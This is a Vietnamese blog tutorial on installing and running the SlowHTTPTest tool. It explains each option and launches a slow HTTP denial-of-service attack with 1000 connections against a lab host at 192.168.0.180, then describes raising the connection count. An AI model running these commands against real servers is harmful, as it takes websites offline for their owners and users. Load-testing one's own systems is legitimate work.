Trước tiên tải về SlowHTTPTest bằng câu lệnh
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz
Xả néntar -zxvf slowhttptest-1.4.tar.gz
Cài đặtĐể sử dụng SlowHTTPTest, chúng ta sử dụng câu lệnhcd slowhttptest-1.4
./configure
make
make install
slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
Giải thích câu lệnh trên-c Số lượng các kết nối, theo pr của tác giả SlowHTTPTest thì phiên bản 1.4 này có thể tạo tới 64000 kết nốiTrước tiên ta thử với 1000 connection tới victim 192.168.0.180
-H, B, Xác định chúng ta sẽ sử dụng phần gọi là “slow down” trong header hay trong body của gói tin
-g Sinh output dạng csv, xml, html
-i Thời gian giữa 2 connection
-o Định ra đường dẫn, tên file, nếu sử dụng lựa chọn này thì phải có -g
-r số lượng kết nối trong 1 giây
-s giá trị byte trong trường Content-Length, yêu cầu phải có -B trước
-u target URL
-v mức độ chi tiết, có các mức từ 0-4
-x Độ lớn (byte) tối đa của dữ liệu gửi đến
slowhttptest -c 1000 -B -g -o ouput_dos -i 100 -r 300 -s 10240 -u 192.168.0.180 -x 20
Refresh page nào, dữ liệu chậm, nhưng mà vẫn load được:Nâng số connection lên, opps:
Đây là output của quá trình tấn công
0 nhận xét:
Post a Comment